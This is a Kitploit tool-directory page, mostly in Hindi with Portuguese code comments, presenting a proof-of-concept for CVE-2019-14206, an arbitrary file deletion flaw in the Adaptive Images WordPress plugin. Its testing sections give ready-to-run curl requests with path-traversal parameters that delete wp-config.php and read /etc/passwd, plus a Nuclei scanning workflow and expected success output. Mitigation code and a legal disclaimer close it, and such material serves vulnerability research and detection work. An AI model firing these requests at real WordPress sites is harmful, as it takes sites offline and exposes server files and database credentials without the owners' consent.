Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2019-14206-poc | Kitploit
उपकरण/GitHubGitHub/developerfred/cve-2019-14206-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-14206 - WordPress के लिए Adaptive Images मनमाना फ़ाइल विलोपन

📋 सूची

  1. भेद्यता के बारे में
  2. पूर्वापेक्षाएँ
  3. स्थापना
  4. परीक्षण विधियाँ
    • त्वरित परीक्षण
    • Docker के साथ पूर्ण परीक्षण
    • Nuclei के साथ परीक्षण
    • मैन्युअल परीक्षण
  5. परिणामों की व्याख्या
  6. सफ़ाई
  7. समस्या निवारण
  8. शमन
  9. कानूनी चेतावनी

🎯 भेद्यता के बारे में

CVE-ID: CVE-2019-14206
गंभीरता: उच्च (CVSS 6.5)
प्रभावित प्लगिन: Adaptive Images for WordPress
प्रभावित संस्करण: < 0.6.67

यह भेद्यता क्या अनुमति देती है?

यह भेद्यता एक दूरस्थ और बिना प्रमाणीकरण वाले हमलावर को Adaptive Images प्लगिन का शोषण करके WordPress सर्वर पर मनमानी फ़ाइलें विलोपित करने की अनुमति देती है।

वास्तविक प्रभाव:

  • ❌ wp-config.php का विलोपन जिससे साइट पूरी तरह से बंद हो जाती है
  • ❌ डेटाबेस क्रेडेंशियल्स का एक्सपोज़र LFI के माध्यम से
  • ⚠️ हमले की श्रृंखला जो RCE (रिमोट कोड निष्पादन) की ओर ले जाती है
  • 🔴 WordPress साइट से पूर्ण समझौता

मूल कारण:

root@kitploit:~
// O plugin usa input do usuário SEM sanitização
$settings = $_REQUEST['adaptive-images-settings'];

// Constrói caminho de arquivo com parâmetros controlados pelo atacante
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// DELETA arquivo arbitrário
unlink($cache_file);

💻 पूर्वापेक्षाएँ

न्यूनतम आवश्यकताएँ:

  • ऑपरेटिंग सिस्टम: macOS, Linux या Windows
  • Nuclei: संस्करण 3.0 या उससे ऊपर (इंस्टॉल करें)
  • Bash: संस्करण 4.0 या उससे ऊपर
  • curl: मैन्युअल परीक्षणों के लिए
  • PHP: संस्करण 7.0+ (वैकल्पिक, बिल्ट-इन सर्वर के साथ परीक्षण के लिए)

पूर्वापेक्षाओं की जाँच करना:

root@kitploit:~
# Verificar Nuclei
nuclei --version

# Verificar Bash
bash --version

# Verificar curl
curl --version

# Verificar PHP (opcional)
php --version 2>/dev/null || echo "PHP não disponível (opcional)"

🚀 स्थापना

चरण 1: फ़ाइलें क्लोन करें या डाउनलोड करें

root@kitploit:~
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

चरण 2: फ़ाइल संरचना सत्यापित करें

root@kitploit:~
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

चरण 3: स्क्रिप्ट को निष्पादन योग्य बनाएं

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 परीक्षण विधियाँ

1. त्वरित परीक्षण ⏱️ 2 मिनट

संपूर्ण शोषण का अनुकरण करने वाला पूर्ण डेमो चलाएँ:

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

क्या होता है:

  • पूर्ण परीक्षण वातावरण बनाता है
  • भेद्यता का अनुकरण करता है
  • फ़ाइल विलोपन प्रदर्शित करता है
  • Nuclei टेम्पलेट को मान्य करता है

अपेक्षित आउटपुट:

root@kitploit:~
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. Docker के साथ पूर्ण परीक्षण 🐳 10 मिनट

चरण 1: Docker वातावरण प्रारंभ करें

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Se Docker estiver rodando
docker-compose up -d

# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh

चरण 2: WordPress तक पहुँचें

root@kitploit:~
# O ambiente estará disponível em
# http://localhost:8888

चरण 3: भेद्य प्लगिन सत्यापित करें

root@kitploit:~
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

चरण 4: परीक्षण चलाएँ

root@kitploit:~
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Nuclei के साथ परीक्षण 🎯 5 मिनट

चरण 1: लक्ष्य सूची तैयार करें

root@kitploit:~
# Criar arquivo de alvos
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

चरण 2: स्कैन चलाएँ

root@kitploit:~
# Scan básico
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Scan detalhado
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Scan com debug (OBRIGATÓRIO para bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Salvar resultados
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

चरण 3: परिणामों की व्याख्या करें

root@kitploit:~
# Ver resultados
cat results.txt

# Resultados positivos terão:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. मैन्युअल परीक्षण 🔧 10 मिनट

चरण 1: PHP सर्वर प्रारंभ करें

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

चरण 2: LFI का परीक्षण करें (फ़ाइलें पढ़ना)

root@kitploit:~
# Tentar ler /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Tentar ler wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

अपेक्षित परिणाम (LFI):

root@kitploit:~
=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

चरण 3: फ़ाइल विलोपन का परीक्षण करें

root@kitploit:~
# Verificar se wp-config.php existe ANTES
ls -la wp-config.php

# Executar exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado DEPOIS
ls -la wp-config.php

अपेक्षित परिणाम (फ़ाइल विलोपन):

root@kitploit:~
[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 परिणामों की व्याख्या

सकारात्मक परिणाम (भेद्य):

root@kitploit:~
[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

नकारात्मक परिणाम (भेद्य नहीं):

root@kitploit:~
[N/A] No results found

गलत नकारात्मक के संभावित कारण:

  • ✅ प्लगिन स्थापित नहीं है
  • ✅ प्लगिन अद्यतन किया गया है (संस्करण >= 0.6.67)
  • ✅ WAF अनुरोधों को अवरुद्ध कर रहा है
  • ✅ सर्वर अपेक्षित पथों पर प्रतिक्रिया नहीं देता है

🧹 सफ़ाई

परीक्षण वातावरण साफ़ करें:

root@kitploit:~
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt

# Restaurar wp-config.php se foi deletado
cat > wp-config.php << 'EOF'
<?php
// Arquivo restaurado
define('DB_NAME', 'wordpress');
EOF

Nuclei साफ़ करें:

root@kitploit:~
# Remover resultados de scan
rm -f results.txt

# Limpar cache (opcional)
nuclei -rm-cache

🔧 समस्या निवारण

समस्या 1: Nuclei नहीं मिला

root@kitploit:~
# Instalar Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Ou baixar binário
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.0.0/nuclei-linux-amd64.zip
unzip nuclei-linux-amd64.zip
chmod +x nuclei
sudo mv nuclei /usr/local/bin/

समस्या 2: टेम्पलेट लोड नहीं होता

root@kitploit:~
# Verificar se arquivo existe
ls -la http/cves/2019/CVE-2019-14206.yaml

# Verificar sintaxe YAML
python3 -c "import yaml; yaml.safe_load(open('http/cves/2019/CVE-2019-14206.yaml'))"

# Usar caminho absoluto
nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://target

समस्या 3: PHP सर्वर प्रारंभ नहीं होता

root@kitploit:~
# Verificar porta
lsof -i :8888

# Usar porta diferente
php -S localhost:9999

# Verificar PHP instalado
which php
php --version

समस्या 4: Docker नहीं चलता

root@kitploit:~
# Verificar status Docker
docker ps

# Iniciar Docker
# No macOS: Abrir Docker Desktop
# No Linux: sudo systemctl start docker

# Usar modo simulador (funciona sem Docker)
./docker-test-full.sh

🛡️ शमन

तत्काल सुरक्षा:

  1. प्लगिन अद्यतन करें:

    root@kitploit:~
    Painel WordPress > Plugins > Atualizar Adaptive Images
    
  2. सुरक्षित संस्करण: >= 0.6.67

  3. भेद्य प्लगिन हटाएँ:

    root@kitploit:~
    rm -rf wp-content/plugins/adaptive-images/
    

कोड में सुरक्षा (डेवलपर्स के लिए):

root@kitploit:~
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
    // Sanitizar input
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // Validar caminhos
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // Recusar caminhos inválidos
    }
    
    // Usar caminhos absolutos validados
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}

⚠️ कानूनी चेतावनी

उपयोग की शर्तें:

यह सामग्री विशेष रूप से शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है।

आप क्या कर सकते हैं:

  • ✅ अपने स्वामित्व वाले सिस्टम पर परीक्षण करें
  • ✅ प्रयोगशाला वातावरण में उपयोग करें
  • ✅ वेब भेद्यताओं के बारे में सीखें
  • ✅ ओपन सोर्स सुरक्षा में योगदान करें
  • ✅ अपने स्वयं के अनुप्रयोगों का परीक्षण करें

आप क्या नहीं कर सकते:

  • ❌ बिना अनुमति के सिस्टम पर परीक्षण करना
  • ❌ क्षति या व्यवधान उत्पन्न करना
  • ❌ दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करना
  • ❌ एक्सप्लॉइट बेचना या वितरित करना
  • ❌ भेद्य सिस्टम की जानकारी प्रकाशित करना

ज़िम्मेदारी:

लेखक और योगदानकर्ता निम्नलिखित के लिए कोई ज़िम्मेदारी नहीं लेते:

  • इस सामग्री का दुरुपयोग
  • सिस्टम को हुई क्षति
  • डेटा की हानि
  • सेवा में व्यवधान
  • कानूनी समस्याएँ

जिम्मेदार प्रकटीकरण:

यदि आपको यह भेद्यता वास्तविक सिस्टम पर मिलती है:

  1. नहीं शोषण करें या क्षति न पहुँचाएँ
  2. दस्तावेज़ीकरण करें भेद्यता का
  3. सूचित करें सिस्टम के जिम्मेदार व्यक्ति को
  4. पालन करें जिम्मेदार प्रकटीकरण दिशानिर्देशों का

📚 अतिरिक्त संसाधन

संदर्भ:

  • NVD - CVE-2019-14206
  • मूल शोध
  • आधिकारिक प्लगिन
  • WPScan प्रविष्टि

संबंधित उपकरण:

  • Nuclei
  • nuclei-templates
  • WPScan
  • Wordfence

🎓 सीखे गए सबक

यह प्रोजेक्ट प्रदर्शित करता है:

  1. Input Validation: सभी उपयोगकर्ता इनपुट को सैनिटाइज़ करने का महत्व
  2. Path Traversal: फ़ाइल पथों को कैसे हेरफेर किया जा सकता है
  3. File Operations: उपयोगकर्ता इनपुट के साथ unlink() जैसे फ़ंक्शन के जोखिम
  4. Plugin Security: WordPress प्लगिन में सामान्य भेद्यताएँ
  5. CVE Analysis: भेद्यताओं का विश्लेषण और पुनरुत्पादन कैसे करें
  6. Detection Development: प्रभावी डिटेक्शन टेम्पलेट कैसे बनाएं

📝 परिवर्तन लॉग

संस्करण 1.0.0 (2026-01-04)

  • ✅ Nuclei टेम्पलेट बनाया गया
  • ✅ पूर्ण PoC वातावरण
  • ✅ पूर्ण दस्तावेज़ीकरण
  • ✅ परीक्षण स्क्रिप्ट सत्यापित
  • ✅ कार्यात्मक डेमो

🤝 योगदान

योगदान का स्वागत है! योगदान करने के लिए:

  1. रिपॉजिटरी को फोर्क करें
  2. एक ब्रांच बनाएं (git checkout -b feature/improvement)
  3. अपने परिवर्तनों को कमिट करें (git commit -am 'Add improvement')
  4. ब्रांच पर पुश करें (git push origin feature/improvement)
  5. एक Pull Request बनाएं

📧 सहायता

संदेह या समस्याओं के लिए:

  1. समस्या निवारण अनुभाग देखें
  2. रिपॉजिटरी के issues देखें
  3. समस्या का दस्तावेज़ीकरण करें:
    • ऑपरेटिंग सिस्टम
    • Nuclei संस्करण
    • PHP संस्करण (यदि लागू हो)
    • पूर्ण त्रुटि संदेश
    • पुनरुत्पादन के चरण

🎉 इस परीक्षण सामग्री का उपयोग करने के लिए धन्यवाद!

याद रखें: जितनी बड़ी शक्ति, उतनी बड़ी ज़िम्मेदारी। इस ज्ञान का उपयोग इंटरनेट को अधिक सुरक्षित बनाने के लिए करें, अधिक भेद्य नहीं।


निर्मित: 4 जनवरी 2026
संस्करण: 1.0.0
स्थिति: ✅ उत्पादन उपयोग के लिए तैयार

टूल डाउनलोड करें